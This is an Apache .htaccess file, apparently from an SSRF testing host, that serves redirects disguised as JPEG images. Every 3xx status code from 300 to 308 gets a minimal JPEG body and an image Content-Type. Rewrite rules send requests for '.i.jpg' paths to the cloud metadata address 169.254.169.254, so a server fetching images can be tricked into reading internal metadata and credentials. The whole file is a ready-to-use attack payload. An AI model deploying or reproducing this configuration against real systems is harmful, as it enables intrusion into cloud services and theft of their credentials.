# Set smallest image response body - httpss://github.com/mathiasbynens/small/blob/master/jpeg.jpg
ErrorDocument 300 "ÿØÿÛ^@C^@^C^B^B^B^B^B^C^B^B^B^C^C^C^C^D^F^D^D^D^D^D^H^F^F^E^F   ^H      ^H              ^L^O^L^K^N^K            ^M^Q^M^N^O^P^P^Q^P^L^R^S^R^P^S^O^P^P^PÿÉ^@^K^H^@^A^@^A^A^A^Q^@ÿÌ^@^F^@^P^P^EÿÚ^@^H^A^A^@^@?^@ÒÏ ÿÙ"
ErrorDocument 301 "ÿØÿÛ^@C^@^C^B^B^B^B^B^C^B^B^B^C^C^C^C^D^F^D^D^D^D^D^H^F^F^E^F   ^H      ^H              ^L^O^L^K^N^K            ^M^Q^M^N^O^P^P^Q^P^L^R^S^R^P^S^O^P^P^PÿÉ^@^K^H^@^A^@^A^A^A^Q^@ÿÌ^@^F^@^P^P^EÿÚ^@^H^A^A^@^@?^@ÒÏ ÿÙ"
ErrorDocument 302 "ÿØÿÛ^@C^@^C^B^B^B^B^B^C^B^B^B^C^C^C^C^D^F^D^D^D^D^D^H^F^F^E^F   ^H      ^H              ^L^O^L^K^N^K            ^M^Q^M^N^O^P^P^Q^P^L^R^S^R^P^S^O^P^P^PÿÉ^@^K^H^@^A^@^A^A^A^Q^@ÿÌ^@^F^@^P^P^EÿÚ^@^H^A^A^@^@?^@ÒÏ ÿÙ"
ErrorDocument 303 "ÿØÿÛ^@C^@^C^B^B^B^B^B^C^B^B^B^C^C^C^C^D^F^D^D^D^D^D^H^F^F^E^F   ^H      ^H              ^L^O^L^K^N^K            ^M^Q^M^N^O^P^P^Q^P^L^R^S^R^P^S^O^P^P^PÿÉ^@^K^H^@^A^@^A^A^A^Q^@ÿÌ^@^F^@^P^P^EÿÚ^@^H^A^A^@^@?^@ÒÏ ÿÙ"
ErrorDocument 305 "ÿØÿÛ^@C^@^C^B^B^B^B^B^C^B^B^B^C^C^C^C^D^F^D^D^D^D^D^H^F^F^E^F   ^H      ^H              ^L^O^L^K^N^K            ^M^Q^M^N^O^P^P^Q^P^L^R^S^R^P^S^O^P^P^PÿÉ^@^K^H^@^A^@^A^A^A^Q^@ÿÌ^@^F^@^P^P^EÿÚ^@^H^A^A^@^@?^@ÒÏ ÿÙ"
ErrorDocument 307 "ÿØÿÛ^@C^@^C^B^B^B^B^B^C^B^B^B^C^C^C^C^D^F^D^D^D^D^D^H^F^F^E^F   ^H      ^H              ^L^O^L^K^N^K            ^M^Q^M^N^O^P^P^Q^P^L^R^S^R^P^S^O^P^P^PÿÉ^@^K^H^@^A^@^A^A^A^Q^@ÿÌ^@^F^@^P^P^EÿÚ^@^H^A^A^@^@?^@ÒÏ ÿÙ"
ErrorDocument 308 "ÿØÿÛ^@C^@^C^B^B^B^B^B^C^B^B^B^C^C^C^C^D^F^D^D^D^D^D^H^F^F^E^F   ^H      ^H              ^L^O^L^K^N^K            ^M^Q^M^N^O^P^P^Q^P^L^R^S^R^P^S^O^P^P^PÿÉ^@^K^H^@^A^@^A^A^A^Q^@ÿÌ^@^F^@^P^P^EÿÚ^@^H^A^A^@^@?^@ÒÏ ÿÙ"

# 300 with response body
# https://ssrf.localdomain.pw/img-with-body-md/300-http-.i.jpg
# https://ssrf.localdomain.pw/img-with-body-md/300-http-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 300-([^/-]*)-(.*).i.jpg$
RewriteRule 300-([^/-]*)-(.*).i.jpg$ $1://169.254.169.254/$2 [L,R=300,NC]

# 301 with response body
# https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
# https://ssrf.localdomain.pw/img-with-body-md/301-http-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 301-([^/-]*)-(.*).i.jpg$
RewriteRule 301-([^/-]*)-(.*).i.jpg$ $1://169.254.169.254/$2 [L,R=301,NC]

# 302 with response body
# https://ssrf.localdomain.pw/img-with-body-md/302-http-.i.jpg
# https://ssrf.localdomain.pw/img-with-body-md/302-http-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 302-([^/-]*)-(.*).i.jpg$
RewriteRule 302-([^/-]*)-(.*).i.jpg$ $1://169.254.169.254/$2 [L,R=302,NC]

# 303 with response body
# https://ssrf.localdomain.pw/img-with-body-md/303-http-.i.jpg
# https://ssrf.localdomain.pw/img-with-body-md/303-http-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 303-([^/-]*)-(.*).i.jpg$
RewriteRule 303-([^/-]*)-(.*).i.jpg$ $1://169.254.169.254/$2 [L,R=303,NC]

# 305 with response body
# https://ssrf.localdomain.pw/img-with-body-md/305-http-.i.jpg
# https://ssrf.localdomain.pw/img-with-body-md/305-http-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 305-([^/-]*)-(.*).i.jpg$
RewriteRule 305-([^/-]*)-(.*).i.jpg$ $1://169.254.169.254/$2 [L,R=305,NC]

# 307 with response body
# https://ssrf.localdomain.pw/img-with-body-md/307-http-.i.jpg
# https://ssrf.localdomain.pw/img-with-body-md/307-http-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 307-([^/-]*)-(.*).i.jpg$
RewriteRule 307-([^/-]*)-(.*).i.jpg$ $1://169.254.169.254/$2 [L,R=307,NC]

# 308 with response body
# https://ssrf.localdomain.pw/img-with-body-md/308-http-.i.jpg
# https://ssrf.localdomain.pw/img-with-body-md/308-http-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 308-([^/-]*)-(.*).i.jpg$
RewriteRule 308-([^/-]*)-(.*).i.jpg$ $1://169.254.169.254/$2 [L,R=308,NC]

# Always set the Content-Type header image/jpeg
Header always set Content-Type image/jpeg
# Always set Cache-Control to max-age=0, must-revalidate, no-cache, no-store, private
Header always set Cache-Control "max-age=0, must-revalidate, no-cache, no-store, private"
# Always set Pragma to no-cache
Header always set Pragma no-cache
